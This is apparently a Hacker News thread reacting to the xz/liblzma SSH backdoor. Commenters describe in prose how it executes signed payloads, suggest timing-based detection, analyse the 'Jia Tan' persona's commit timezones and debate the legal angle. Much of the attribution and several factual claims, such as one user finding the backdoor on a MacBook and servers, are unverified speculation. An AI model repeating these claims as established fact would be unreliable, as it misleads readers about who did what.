This can’t be the first time someone attempted this - this is just the first unsuccessful time. (Yes, I know about the attempted/discovered backdoor in the linux kernel - this is remote and is a horse of a different color).
Why did they decide to create a backdoor, instead of using a zeroday like everyone else?
Why did they implement a fully-featured backdoor and attempted to hide the way it is deployed, instead of deploying something innocent-looking that might as well be a bug if detected?
These must have been conscious decisions. The reasons might provide a hint what the goals might have been.
Presumably because other people can also utilize the “bug” they create intentionally but looking inadvertently. This backdoor however is activated by the private key only the attacker has so it’s airtight.
If they seemingly almost succeeded how many others have already done similar backdoor? Or was this actually just poking on things seeing if it was possible to inject this sort of behaviour?
Wild guess, but it could be that whoever was behind this was highly motivated but didn't have the skill required to find zerodays and didn't have the connections required to buy them (and distrusted the come one come all marketplaces I assume must exist).
Also: Why did Debian apply patches to a service that runs as root (when those patches have been rected upstream) for a second time after such behavior has already led to a widely known vulnerability in Debian.
So this basically means to scan for this exploit remotely we'd need the private key of the attacker which we don't have. Only other option is to run detection scripts locally. Yikes.
One completely awful thing some scanners might choose to do is if you're offering RSA auth (which most SSH servers are and indeed the SecSH RFC says this is Mandatory To Implement) then you're "potentially vulnerable" which would encourage people to do password auth instead.
Unless we find that this problem has somehow infested a lot of real world systems that seems to me even worse than the time similar "experts" decided that it was best to demand people rotate their passwords every year or so thereby ensuring the real security is reduced while on paper you claim you improved it.
Have to admit I've never understood why password auth is considered so much worse than using a cert - surely a decent password (long, random, etc) is for all practical purposes unguessable, and so you're either using a private RSA key that no-one can guess, or a password that no-one can guess, and then what's the difference? With the added inconvenience of having to pass around a certificate if you want to login to the same account from from multiple sources.
One of the biggest differences is that if you're using password auth, and you are tricked into connecting to a malicious server, that server now has your plaintext password and can impersonate you to other servers.
If you use a different strong random password for every single server, this attack isn't a problem, but that adds a lot of management hassle compared to using a single private key. (It's also made more difficult by host key checking, but let's be honest, most of us don't diligently check the fingerprints every single time we get a mismatch warning.)
In contrast, if you use an SSH key, then a compromised server never actually gets a copy of your private key unless you explicitly copy it over. (If you're have SSH agent forwarding turned on, then during the compromised connection, the server can run a "confused deputy" attack to authenticate other connections using your agent's identity. But it loses that ability when you disconnect.)
If a man in the middle relays a public key challenge, that will indeed result in a valid connection, but the connection will be encrypted such that only the endpoints (or those who possess a private key belonging to one of the endpoints) can read the resulting traffic. So the man in the middle is simply relaying an encrypted conversation and has no visibility into the decrypted contents.
The man in the middle can still perform denial of service, by dropping some or all of the traffic.
The man in the middle could substitute their own public key in place of one of the endpoint's public keys, but if each endpoint knows the other endpoint's key and is expecting that other key, then an unexpected substitute key will raise a red flag.
No, these schemes use the pub/private keys to setup symmetric crypto, so just passing it along does you no good because what follows is a bunch of stuff encrypted by a session key only the endpoints know.
If I am a server and have your public key in an authorized_keys file, I can just encrypt a random session key using that and only you will be able to decrypt it to finish setting up the session.
This is why passwords and asymmetric crypto are worlds apart in security guarantees.
> if you're using password auth, and you are tricked into connecting to a malicious server, that server now has your plaintext password and can impersonate you to other servers.
Why would the password be sent in plaintext instead of, say, sending a hash of the password calculated with a salt that is unique per SSH server? Or something even more cryptographically sound.
In fact, passwords in /etc/shadow already do have random salts, so why aren't these sent over to the SSH client so it can send a proper hash instead of the plaintext password?
If the hash permits a login then having a hash is essentially equivalent to having a password. The malicious user wouldn't be able to use it to sudo but they could deploy some other privilege escalation once logged in.
Even so, these protocols require the server to know your actual password, not just a hash of the password, even though the password itself never traverses the network. So a compromised server can still lead to a compromised credential, and unless you use different passwords for every server, we're back to the same problem.
Asymmetric PAKEs don't require the server to know your password. You and the server need to have a discussion to establish some parameters that work for your chosen password, without revealing what it is, and then in future you can supply evidence that you indeed know the password (that is, some value which satisfies the agreed parameters), still without revealing what it is. This is not easy to do correctly, whereas it's really easy to get it wrong...
> Have to admit I've never understood why password auth is considered so much worse than using a cert
Password auth involves sending your credentials to the server. They're encrypted, but not irreversibly; the server needs your plaintext username and password to validate them, and it can, in principle, record them to be reused elsewhere.
Public key and certificate-based authentication only pass your username and a signature to the server. Even if you don't trust the server you're logging into, it can't do anything to compromise other servers that key has access to.
> surely a decent password (long, random, etc) is for all practical purposes unguessable
Sadly that is not how normies use passwords. WE know what passwords managers are for. Vast majority of people outside our confined sphere do not.
In short: password rotation policies make passwords overall less secure, because in order to remember what the new password is, people apply patterns. Patterns are guessable. Patterns get applied to future password as well. This has been known to the infosec people since 1990's because they had to understand how people actually behave. It took a research paper[0], published in 2010, to finally provide sufficient data for that fact to become undeniable.
It still took another 6-7 years until the information percolated through to the relevant regulatory bodies and for them to update their previous guidance. These days both NIST and NCSC tell in very clear terms to not require password rotation.
It depends what happens to the password. Typically it's sent as a bearer credential. But there are auth schemes (not widely used these days) where the password isn't sent over the wire.
Even if you use a scheme where the password never traverses the wire, the schemes still require the server to know what your password is in order to perform the authentication. So a compromised server still leads to compromise of your secret credential. Public key authentication does not have this property.
Wow, really? Ten years ago, it was drilled into me to never send a password like that, especially since the server shouldn't have the plain version anyway (so no reason for the client to send it).
I didn't want to believe you, but man, I just checked a few websites in the network inspector... and it seems like GMail, Hackernews, Wordpress, Wix, and Live.com all just sent it in plaintext with only SSL encryption :(
That's a bit disappointing. But TIL. Thanks for letting me know!
If you want to hop into a rabbit hole, try taking look in Steam's login send the user and pass))
If TLS break then all is untrusted anyway! If you read hash as MITM you can replay it as pass equivalent and log in with hash, do not need knowledge of the original pass. You can just inject the script to exfilatrate original pass before hashing. CSP is broken, since you can edit header to give your own script a inline nonce. I think everything is reliant on TLS in end.
I think 10yr ago before TLS was 99%+ standard on all sites many people would come up with schemes, forums would md5 pass client side and send md5, all sorts were common. But now trust is in TLS.
> Salted hash for transmitting passwords is a good technique. This ensures that the password can not be stolen even if the SSL key is broken
I'm a little confused with this recommendation
How server is supposed to verify user's password in this case? Store the same hash with exactly the same salt in the database, effectively making the transmitted salted hash a cleartext password?
Yes, the server should never have the cleartext password. In this case the salted hash is the same as a password to you, but it protects users who reuse the same password across different sites. If your entire password DB gets leaked, the attacker would be able to login to your site as your users, but they wouldn't be able to login as those users to other sites without brute forcing all the hashes.
Edit: I guess the reverse is also true, that is, leaked user passwords from other sources can't be easily tested against your user accounts just by sending a bunch of HTTP requests to your server. The attacker would have to at least run the passwords through your particular salted hash scheme first (which they can get by reverse engineering your client, but it's extra labor and computation).
That page seems to be a community wiki, and I think the original authors are somewhat confused on that point.
If you salt and hash the password on the client side, how is the server going to verify the password. Everything I can think of either requires the server to store the plaintext password (bad) or basically makes the hashed bytes become the plaintext password (pointless).
But I think the point of salting + hashing the password isn't quite the same as what TLS offers. It's not necessarily to prevent MITM eavesdropping, but to help protect the user from credential re-use from leaks.
What was I taught is that your server should never have the user's cleartext password to begin with, only the salted hash. As soon as they set it, the server only ever gets (and saves) the salted hash. That way, in the worst case scenario (data leak or rogue employee), at most your users would only have their accounts with you compromised. The salted hashes are useless anywhere else (barring quantum decryption). To you they're password equivalents, but they turn the user's weak reused password (that they may be using for banking, taxes, etc.) into a strong salted hash that's useless anywhere else.
That's the benefit of doing it serverside, at least.
Doing it clientside, too, means that the password itself is also never sent over the wire, just the salted hash (which is all the server needs, anyway), limiting the collateral damage if it IS intercepted in transit. But with widespread HTTPS, that's probably not a huge concern. I do think it can help prevent accidental leaks, like if your auth endpoint was accidentally misconfigured and caching or logging requests with cleartext passwords... again, just to protect the user from leaks.
It doesn’t actually do anything because if SSL is compromised then all of the junk you think you are telling the client to do to the password is via JavaScript that is also compromised.
If you’re worried about passive listeners with ssl private keys, perfect forward secrecy at the crypto layer solved that a long time ago.
For browsers at least, sending passwords plainly over a tls session is as good as it gets.
It's not to protect against MITM but against credential reuse. It offers no additional security over SSL but what it does protect against is user passwords being leaked and attackers being able to reuse that same password across the user's other online accounts (banks, etc.).
No. Everything you do on the client side you can also keep not doing at all.
You can imagine the salted and hashed password in your scheme to be "the password". Because the server will still know it, and could use it to log in somewhere else (it just has to skip the salt-and-hash step).
On that last point, I wouldn't pass around the certificate to log in from multiple sources, rather each source would have its own certificate. That is easy & cheap to do (especially with ed25519 certs).
Ah right, that's useful, thanks. Presumably if you need to login from an untrusted source (e.g. in an emergency), then you're out of luck in that case? Do you maybe keep an emergency access cert stashed somewhere?
That's a very good question. Likely depends on the circumstances. I don't quite know any ways of using untrusted sources safely. Maybe something where you can use temporary credentials (say 2FA), or the the likes of using AWS's EC2 Instance Connect, but there's always a problem of _something_ has to be on an untrusted location, I guess?
Having some emergency access certs in a password manager might be a good backup (and rotating it after using it on an untrusted source?).
The best way is, however, removing the need in emergencies to access a machine (e.g. more of the "cattle vs pets" way of thinking). But that's hard for sure.
> ...rotating it after using it on an untrusted source?...
> ...the "cattle vs pets" way of thinking...
Good points both... To the former, of course you're right that once used, an emergency cert should be replaced, which could be onerous either from the point of view of having double the number of certs to manage (rather than one master key), or else having to rotate the master key on all servers. To the latter, I'm definitely thinking about pets, so I hadn't considered just throwing away the VM and starting again; that neatly sidesteps the issue.
A lot of it has to do with centralizing administration. If you have more than one server and more than one user, certificates reduce a NxM problem into N+M instead.
Certificates can be revoked, they can have short expiry dates and due to centralized administration, renewing them is not terribly inconvenient.
On top of that they are a lot more difficult to read over the shoulder, to some degree that can be considered the second factor in a MFA scheme. Same reasons why passkeys are preferred over passwords lately. Not as secure as a HW-key, still miles better than “hunter2”.
It might be possible to use timing information to detect this, since the signature verification code appears to only run if the client public key matches a specific fingerprint.
The backdoor's signature verification should cost around 100us, so keys matching the fingerprint should take that much longer to process than keys that do not match it. Detecting this timing difference should at least be realistic over LAN, perhaps even over the internet, especially if the scanner runs from a location close to the target. Systems that ban the client's IP after repeated authentication failures will probably be harder to scan.
According to[1], the backdoor introduces a much larger slowdown, without backdoor: 0m0.299s, with backdoor: 0m0.807s. I'm not sure exactly why the slowdown is so large.
The effect of the slowdown on the total handshake time wouldn't work well for detection, since without a baseline you can't tell if it's slow due to the backdoor, or due to high network latency or a slow/busy CPU. The relative timing of different steps in the TCP and SSH handshakes on the other hand should work, since the backdoor should only affect one/some steps (RSA verification), while others remain unaffected (e.g. the TCP handshake).
However only probabilistic detection is possible that way and really 100us variance over the internet would require many many detection attempts to discern.
The tweet says "unreplayable". Can someone explain how it's not replayable? Does the backdoored sshd issue some challenge that the attacker is required to sign?
What it does is this: RSA_public_decrypt verifies a signature on the client's (I think) host key by a fixed Ed448 key, and then if it verifies, passes the payload to system().
If you send a request to SSH to associate (agree on a key for private communications), signed by a specific private key, it will send the rest of the request to the "system" call in libc, which will execute it in bash.
So this is quite literally a "shellcode". Except, you know, it's on your system.
That sounds repayable though. If I did a tcpdump of the attacker attacking my system, I could replay that attack against someone other system. For it to not be replayable, there needs to be some challenge issued by the backdoored sshd.
Of course since the backdoor was never widely deployed and is now public, I think it's unlikely the attacker will attempt to use it. So whether it's replayable doesn't have a practical impact now. I'm only asking about replayability because I'm curious how it's unreplayable.
Unpopular opinion, but I cannot but admire the whole operation. Condemn it of course, but still admire it. It was a piece of art! From conception to execution, masterful! We got extremely lucky that it was caught so early.
If the payload didn't have a random .5 second hang during SSH login, it would probably not have been found for a long time.
The next time, the attackers probably manage to build a payload that doesn't cause weird latency spikes on operations that people wait on.
(For some reason this brings to mind how Kim Dotcom figured out he was the target of an illegal wiretap... because he suddenly had a much higher ping in MW3. When he troubleshooted, he found out that all his packets specifically got routed a very long physical distance through a GCSB office. GCSB has no mandate to wiretap permanent NZ residents. He ended up getting a personal apology from the NZ Prime Minister.)
I'm a little out of touch, but for over a decade I'd say half the boxes I touched either didn't have enough entropy or were trying to do rDNS for (internal) ranges to servers that didn't host it and is nearly always hand waved away by the team running it as NFN.
That is to say, a half-second pause during the ssh login is absolutely the _least_ suspicious place place for it to happen and I'm somewhat amazed anyone thought to go picking at it as quickly as they did.
What led to continuous investigation wasn't just the 500ms pause, but large spikes in CPU activity when sshd was invoked, even without a login attempt.
> "After all, He-Who-Must-Not-Be-Merged did great things - terrible, yes, but great."
I think the most ingenious part was picking the right project to infiltrate. Reading "Hans'" IFUNC pull request discussion is heart-wrenching in hindsight, but it really shows why this project was chosen.
I would love to know how many people where behind "Jia" and "Hans" analyzing and strategizing communication and code contributions. Some aspects, like those third tier personas faking pressure on mailing lists, seem a bit carelessly crafted, so I think it's still possible this was done by a sophisticated small team or even single individual. I presume a state actor would have people pumping out and maintaining fake personas all day for these kind of operations. I mean, would have kinda sucked, if someone thought: "Hm. It's a bit odd how rudely these three users are pushing. Who are they anyway? Oh, look they are all created at the same time. Suspicious. Why would anyone fake accounts to push so hard for this specifically? I need to investigate". Compared to the overall effort invested, that's careless, badly planned or underfunded.
> Compared to the overall effort invested, that's careless, badly planned or underfunded.
Not at all. It's a pattern that's very easy to spot while the eyes of the world are looking for it. When it was needed, it worked exactly as it needed to work. Had the backdoor not been discovered, no one would have noticed--just like no one did notice for the past couple of years.
Had anyone noticed at the time, it would have been very easy to just back off and try a different tactic a few months down the line. Once something worked, it would be quick to fade into forgotten history--unlikely to be noticed until, like now, the plan was already discovered.
I felt really bad for the original maintainer getting dog-piled by people who berated him for not doing his (unpaid) job and basically just bring shame and discredit to himself and the community. Definitely cruel.
Though… do we know that the maintainer at that point was the same individual as the one who started the project? Goes deep, man.
Its possible the adversary was behind or at least encouraged the dog piling who berated him. Probably a normal basic tactic from a funded evil team playbook.
Might be worth reviewing those who berated him to see if they resolve to real people, to see how deep this operation goes.
Even if it's not his fault the maintainer at this point won't be trusted at all. I feel for him, I think even finding a job at this moment for him would be impossible. Why would you hire someone that could be suspected for that?
No. From what I've read on the openwall and lkml mailing lists (so generally people who know a lot more about these things than I do), nobody accused Lasse Collins, the original maintainer, of being involved in this, at all, and there wasn't any notion of him becoming untrustworthy.
This could've happened to anybody, frankly. The attacker was advanced and persistent. I cannot help but feel sympathetic for the original maintainer here.
I bet it’s not that unpopular. It’s a very impressive attack in many ways:
- It’s subtle.
- It was built to over several years.
- If the attacker hadn’t screwed up the with the weird performance hit that triggered investigation (my dramatic theory: the attacker was horrified at the infonuclear bomb they were detonating and deliberately messed up), we likely wouldn’t know about it.
You can detest the end result while appreciating the complexity of the attack.
I'm assuming nation states and similar actors monitor mailing lists for phrases like "I'm feeling burnt out" or "not enough bandwidth, can you open a PR?"
So I imagine major actors already have other assets in at-risk open source projects, either for the source code or distro patch/packaging level. Is that too tinfoil hat? I only know enough about secops to be dangerous to myself and everyone around me.
Its been all of 24 hours, these things take time. Presumably someone doing an attack this audacious took steps to cover their tracks and is using a fake name.
CISA had a report on this pretty quickly. I think they refer cases to Secret Service for enforcement. But really, we seemingly have no idea who or where the perpetrator is located. This could easily be a state actor. It could be a lone wolf. And the effects of the attack would be global too, so jurisdiction is tricky. We really have no idea at this point. The personas used to push the commits and push for inclusion were almost certainly fronts. I'm sure github is sifting through a slew of subpoenas right now.
github retains an incredible amount of data to review. but if it is a state actor, they likely covered their tracks very well. when i found the original address of the person who hacked elon musk's twitter account it led to an amazon ec2 instance. that instance was bought with stolen financial information and accessed via several vpns and proxies. i would expect state actors to further obfuscate their tracks with shell companies and the like
Based on the level of sophistication being alluded to, I'm personally inclined to assume this is a state actor, possible even some arm of the U.S. govt.
That would honestly be one of the most impactful bits of public service to fall out of any agency, regardless of country. Even if this is nefarious, a couple of intentionally clumsy follow-ups designed to draw further attention would be amazing to see. Think chaos monkey for software supply chain.
Can the community aspects of FOSS survive a Spy vs Spy environment though?
I don't know, but the answer is irrelevant to whether we are in one (we are).
I shudder to think what lurks in the not-open-source world. Closed source software/firmware/microcode, closed spec/design hardware; and artificial restriction of device owners from creating replacement code, or modifying code in consumer and capital goods containing universal machines as components; are significant national security threats and the practice of keeping design internals and intent secret in these products produces a cost on society.
I propose that products which don't adhere to GNU-like standards of openness (caveat*) get national sales taxed some punitive obscene percentage, like 100%. This way the government creates an artificial condition which forces companies to comply lest their market pricing power be absolutely hobbled. If say your company makes five $10MM industrial machines for MEGACORP customer and you're the only game in town, MEGACORP can pay the sales tax. Brian, Dale, and Joe Sixpack can't afford $2,500+ iPhones and Playstations, or $70,000 base model Honda Civics (yes this should apply to cars and especially medical devices/prosthetics), so when Company B comes around making a somewhat inferior competing fully open product then Company A making the proprietary version loses a huge chunk of market share.
(*But not the GNU-spirit distribution rights, so the OEM or vendor is still the only entity legally allowed to distribute [except for national emergency level patches]. Patent rights still apply.)
This is the most direct and sane way to address the coming waves of decade+ old lightbulbs and flatscreens. It has fewest "But if" gotcha exceptions with which to keep screwing you. Stop sticking up for your boss and think about the lack of access to your own devices, or better yet the implicit and nonconsensual perpetual access vendors maintain to universal machines which by all rights only you should have sovereign control over (like cooking your own microcode or tweaking Intel's [but not distributing your tweaks to Intel's])!
Overcomplicated design, sloppy opsec and Eastern European time zone altogether sound more like an attempt to snatch some bitcoins by a small group of people in places.
> This individual/organization needs to be on the top of every country's most wanted lists
Because if the "organization" is a U.S. agency, not much is going to happen here. Russia or China or North Korea might make some strongly worded statements, but nothing is going to happen.
It's also very possible that security researchers won't be able to find out, and government agencies will finger-point as a means of misdirection.
For example, a statement comes out in a month that this was North Korea. Was it really? Or are they just a convenient scapegoat so the NSA doesn't have to play defense on its lack of accountability again?
Highly likely, China has been estimated to have cyberhacking resources that are 10-50x what the USA has currently. It's not even close. The USA will have to up it's game soon or accept China being able to shut down large swathes of the grid and critical infrastructure at will
I did my own research. If you look at the git repository commit log and some mailing list messages, you will see that the author ("Jia Tan", fake name) speaks impeccable English (already lessens the chance of being a Chinese operative), however he commits in the +0800 time zone (Beijing). He works during Chinese holidays and doesn't work during Western holidays.
However, the times don't make sense: It looks like he works mostly at 2am: https://files.catbox.moe/6mdtez.png (hours in the +0800 timezone). I understand this to be indicative of using a different timezone on the computer than where he actually worked, possibly knowing that git commits include the timezone.
If you shift the timezone to US East Coast -0400, it suddenly looks like a very comfortable full-time job, including a fall in commit rate right where the lunch break should be: https://files.catbox.moe/dtvjzr.png
To me, considering that this appears to be a nation-state tier attack, heavily indicates that it was the Americans. Obviously not conclusive proof, but I think it is useful evidence.
Author: Jia Tan <jiat0218@gmail.com>
AuthorDate: Fri Jan 20 21:53:14 2023 +0800
New Years Day (Federal):
Author: Jia Tan <jiat0218@gmail.com>
AuthorDate: Mon Jan 2 22:33:48 2023 +0800
Edit: Also my graphs don't seem to match yours. Did you account for the fact that US/Eastern is -0500 part of the year? I show a spike at what would be 7 am Eastern for both author dates https://imgur.com/a/QcJy16h and commit dates https://imgur.com/a/oMsbNOh and essentially no work being done after noon.
It's a nice analysis but he misses the fact that the Eastern Europe timezone doesn't match office hours, in particular it'd mean he worked around evenings primarily (see this graph https://files.catbox.moe/4itspl.png)
I had noticed UTC+0300 commits in the repository under his name but I believed they might have been simply committed by the main Finnish maintainer who is in the UTC+0300 timezone.
> But I would like to see analysis of timestamp of GitHub events (like PRs and comments timestamps) which are harder to fake.
I doubt the git commit timestamps are faked, since actually faking them is somewhat difficult to do consistently (you would time travel frequently). I don't think there is some kind of github API for this, however from what I've seen they seem to match up with the same work timespan you see in the commit timestamps.
> I had noticed UTC+0300 commits in the repository under his name but I believed they might have been simply committed by the main Finnish maintainer who is in the UTC+0300 timezone.
There was this one though where they are the author and committer... one in +0300, the other in +0800:
commit 3d1fdddf92321b516d55651888b9c669e254634e
Author: Jia Tan <jiat0218@gmail.com>
AuthorDate: Tue Jun 27 17:27:09 2023 +0300
Commit: Jia Tan <jiat0218@gmail.com>
CommitDate: Tue Jun 27 23:56:06 2023 +0800
The time between writing the file and the commit is 89 minutes.
I literally run a git hook that fixes my commit times so I don’t look like a freak to my coworkers making commits at 3am, I think an actor of this caliber would too, so I would bet the git commit times are highly choreographed.
FYI, the Australian comment is wrong, WA (which uses UTC+8) does not DST (there's a party to add it, and multiple referenda which failed to add it), given ASIS is in Canberra (as far as we know ;)), it probably wasn't them.
> He works during Chinese holidays and doesn't work during Western holidays.
“Western Holidays”, as if that is a coherent, cross-nationally consistent set.
Other than the fact that you specific suggestion of it being American makes little sense based in this sibce its not accurate construed as American holidays, this phrasing is bizarre in this context.
and then processed it a bit with gnuplot. Should not be difficult to reproduce this graph, but I am not too much of a gnuplot wizard so I first preprocessed this into some different files in a REPL. Don't have the full code of what I did but it should not be difficult to reproduce, just parse the dates and look at the hours.
I understand the impulse to seek justice, but what crime have they committed? It's illegal to gain unauthorized access, but not to write vulnerable code. Is there evidence that this is being exploited in the wild?
I am definitely not a lawyer so I have no claim to knowing what is or is not a crime. However, if backdooring SSH on a potentially wide scale doesn't trip afoul of laws then we need to seriously have a discussion about the modern world. I'd argue that investigating this as a crime is likely in the best interest of public safety and even (I hesitate to say this) national security considering the potential scale of this. Finally, I would say there is a distinction between writing vulnerable code and creating a backdoor with malicious intent. It appears (from the articles I have been reading so far) that this was malicious, not an accident or lack of skill. We will see over the next few days though as more experts get eyes on this.
Agreed on a moral level, and it's true that describing this as simply "vulnerable code" doesn't capture the clear malicious intent. I'm just struggling to find a specific crime. CFAA requires unauthorized access to occur, but the attacker was authorized to publish changes to xz. Code is speech. It was distributed with a "no warranty" clause in the license.
> knowingly [cause] the transmission of a program, information, code, or command, and as a result of such conduct, intentionally causes damage without authorization, to a protected computer;
Where one of the definitions of “protected computer” is one that is used in interstate commerce, which covers effectively all of them.
The back door is damage. The resulting sshd is like a door with a broken lock. This patch breaks the lock. Transmitting the patch caused intentional damage.
Law isn't code. If someone finds precedent, there will be a way to argue it doesn't cover this specific scenario. They call this conversational process "hypos" in law school, and this fundamental truth is why you never hear of a lawyer being stumped as to how to defend a client.
Ultimately, the CFAA will get it done if it gets that far, armchair lawyering aside.
To pressure test this fully, since this can be caricatured as "we can punish degenerate behavior as needed", which isn't necessarily great: it's also why there's a thin line between a authoritarian puppet judiciary and a fair one.
The malicious author caused the transmission of the release tarball to GitHub and the official project site. This act was intentional and as a direct result other computers were damaged (when their administrators unknowingly installed the backdoored library).
You’ve got to be joking if you’re saying that this wouldn’t be an open and shut case to prosecute. It’s directly on point. Law isn’t code, any jury would have zero trouble convicting on these facts.
CFAA covers distribution of malicious software without the owners consent, the Wire Fraud Act covers malware distribution schemes intended to defraud for property, Computer Misuse act in the UK is broad and far reaching like the CFAA, so this likely fall afoul of that. The GDPR protects personal data, so there's possibly a case that could be made that this violates that as well, though that might be a bit of reach.
In which case the defense will claim, correctly, that this malware was never distributed. It was caught. "Attempted malware distribution" may not actually be a crime (but IANAL so I don't know).
If more than one person was involved, it'd presumably fall under criminal conspiracy. Clearly this was an overt act in furtherance of a crime (unauthorized access under CFAA, at the least).
Nah, the CIA assassinates people in MLAT zones all the time. The laws that apply to you and I don’t apply to the privileged operators of the state’s prerogatives.
We don’t even know that this specific backdoor wasn’t the NSA or CIA. Assuming it was a foreign intelligence service because the fake name was asian-sounding is a bit silly. The people who wrote this code might be sitting in Virginia or Maryland already.
Note that while “Eastern Europe” has firm connotations with countries of which some are known for having corrupt autocracies, booming shady businesses, and organized crime and cybercrime gangs in varying proportions, the time zone mentioned also covers Finland, from which the other author is supposed to be.
>They will as a result probably avoid traveling to unfriendly jurisdictions without a diplomatic passport.
First of all, it's not like their individual identities would ever be known.
Second, they would already know that traveling to a hostile country is a great way to catch bullshit espionage charges, maybe end up tortured, and certainly be used as a political pawn.
Third, this is too sloppy to have originated from there anyways—however clever it was.
Laws don’t fix technical issues any more than they fix physical ones. Clearly this was possible, so it could be done by a foreign intelligence agency or well-hidden criminal organization.
I think this is probably illegal. But, I think we should not punish this sort of thing too harshly. Tech is an ecosystem. Organizations need to evolve to protect themselves. Instead, we should make companies liable for the damage that happens when they are hit by one of these attacks.
Before anyone calls it out: yes, this will be blaming the victim. But, companies aren’t people, and so we don’t really need to worry about the psychological damage that victim blaming would do, in their case. They are systems, that respond to incentives, and we should provide the incentives to make them tough.
What is constantly overlooked here on HN is that in legal terms, one of the most important things is intent. Commenters on HN always approach legal issues from a technical perspective but that is simply not how the judicial system works. Whether something is “technically X” or not is irrelevant, laws are usually written with the purpose of catching people based on their intent (malicious hacking), not merely on the technicalities (pentesters distributing examples).
It is code, but it runs on human wetware which can decode input about actual events into output about intent, and reach consensus about this output via proper court procedures.
Calling this backdoor "vulnerable code" is a gross mischaracterization.
This is closer to a large scale trojan horse, that does not have to be randomly discovered by a hacker to be exploited, but is readily available for privileged remote code execution by whoever have the private key to access this backdoor.
No, it is not illegal to distribute malware by itself, but it is illegal to trick people into installing malware. The latter was the goal of the XZ contributor.
specifically, thevCFAA covers distribution of malicious software without the owners consent. Security researchs downloading malware implicitly give consent to be downloading malware marked as such.
In the UK, at least, unauthorised access to computer material under section 1 of the Computer Misuse Act 1990 - and I would also assume that it would also fall foul of sections 2 ("Unauthorised access with intent to commit or facilitate commission of further offences") and 3A ("Making, supplying or obtaining articles for use in offence under section 1, 3 or 3ZA") as well.
If CFAA doesn't get this guy behind bars then the CFAA is somehow even worse. Not only is it an overbroad and confusing law, it's also not broad enough to actually handcuff people who write malicious code.
Imagine a future where state actors have hundreds of AI agents fixing bugs, gaining reputation while they slowly introduce backdoors. I really hope open source models succeed.
I work for a large closed-source software company and I can tell you with 100% that it is full of domestic and foreign agents. Being open source means that more eyes can and will look at something. That only increases the chance of malicious actions being found out ... just like this supply-chain attack.
Because in the closed source model the frustrated developer that looked into this SSH slowness submits a ticket for the owner of the malicious code to dismiss.
It’s insane to consider the actual discovery of this to be anything other than a lightning strike. What’s more interesting here is that we can say with near certainty that there are other backdoors like this out there.
> Imagine a future where state actors have hundreds of AI agents fixing bugs, gaining reputation while they slowly introduce backdoors. I really hope open source () succeed.
I guess we can only hope verifiable and open source models can counteract the state actors.
Not necessarily. A frustrated developer posts about it, it catches attention of someone who knows how to use Ghidra et al, and it gets dug out quite fast.
Except, with closed-source software maintained by a for-profit company, suck cockup would mean a huge reputational hit, with billions of dollars of lost market cap. So, there are very high incentives for companies to vet their devs, have proper code reviews, etc.
But with open-source, anyone can be a contributor, everyone is a friend, and nobody is reliably real-world-identifiable. So, carrying out such attacks is easier by orders magnitude.
> So, there are very high incentives for companies to vet their devs, have proper code reviews, etc.
I'm not sure about that. It takes a few leetcode interviews to get in major tech companies. As for the review process, it's not always thorough (if it looks legit and the tests pass...). However, employees are identifiable and would take huge risk to be caught doing anything fishy.
We witnessed Juniper generating their VPN keys with Dual EC DRGB, and then the generator constants subverted with Juniper claiming of now knowing how did it happen.
I don’t think it affected Juniper firewall business in any significant way.
... if we want security it needs trust anyway. it doesn't matter if it's amazing Code GPT or Chad NSA, the PR needs to be reviewed by someone we trust.
it's the trust that's the problem.
web of trust purists were right just ahead of the time.
It would actually be sort of interesting if multiple adversarial intelligence agencies could review and sign commits. We might not trust any particular intelligence agency, but I bet the NSA and China would both be interested in not letting much through, if they knew the other guy was looking.
That is an interesting solution. If China, US, Russia, EU, etc all sign off and say "yep this is secure" we should trust it. Since if they think they found an exploit, they might assume the other people found an exploit. This is a little bit like the idea of a fair cut for a cake. If you have two people that want the last slice of cake, you have one cut and the other choose the first slice, since the chooser will choose the biggest slice, so the slicer knowing they will get the smaller will make it as equal as possible. In this case the NSA makes the cut (the code), and Russia / China chooses if its allowed in.
this is why microsoft bought github and has been onboarding major open source projects. they will be the trusted 3rd party (whether we like it our not is a different story)
Imagine a world where a single OSS maintainer can do the work of 100 of today’s engineers thanks to AI. In the world you describe, it seems likely that contributors would decrease as individual productivity increases.
Wouldn't everything produced by an AI explicitly have to be checked/reviewed by a human? If not, then the attack vector just shifts to the AI model and that's where the backdoor is placed. Sure, one may be 50 times more efficient at maintaining such packages but the problem of verifiably secure systems actually gets worse not better.
> OpenSSH certs are weird in that they include the signer's public key.
OpenSSH signatures in general contain signer's public key, which I personally think it's not weird but rather cool since it allows verifying the signature without out of the band key delivery (like in OpenPGP). The authentication of the public key is a separate subject but at least some basic checks can be done with an OpenSSH signature only.
> cool since it allows verifying the signature without out of the band key delivery
hope you do key selection sanitization instead of the default (nobody does). otherwise you're accepting random keys you have laying around (like github) when logging to secret.example.com
Your SSH public keys used on GitHub are very publicly exposed.
This information could be used by SSH servers you are connecting to. You might think you are connecting anonymously, while in fact your SSH client is sending your public key which could then be resolved to your GitHub account.
Lucky the XZ license switched from "Public Domain" to 0BSD in February (just before these 5.6.0 and 5.6.1 releases)!
0BSD has no clauses, but it does have this:
> IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
Uh what would be his charge? I cannot fathom how and based on what he would be charged. Maybe this is an american thing, but he's not an US citizen to start with
If I'm reading this right, would there be any persistent evidence of the executed payload? I can't think of a reason anything would have to go to disk in this situation, so a compromise could easily look like an Auth failure in the logs .... maybe a difference in timings .. but that's about it ...
Unless the payload did something that produced evidence, or if the program using openssl that was affected was, for some reason, having all of its actions logged, then no, probably not.
git.tukaani.org runs sshd. If that sshd was upgraded with the xz backdoor, we cannot exclude that the host was compromised as it could be have been a obvious target for the backdoor author.
And it's kind of smart to attack a compression library - you have plausible deniability for these opaque binary blobs - they are supposedly test cases, but in reality encode parts of the backdoor.
God the amount of damage this would've caused, nightmarish, we are so unbelievably lucky. In a few months it would've been in every deb&rpm distribution. Thank God we found it early!
I found the backdoor on five of my Vultr servers as well as my MacBook Pro this evening. I certainly didn’t catch it early.
So if that’s the state of it, it could very well be too late for many many companies. Not to mention folks who rely on TOR for their safety - there could be entire chains of backdoored entry, middle and exit nodes exposing vast numbers of TOR users over the past month or so (spies included!).
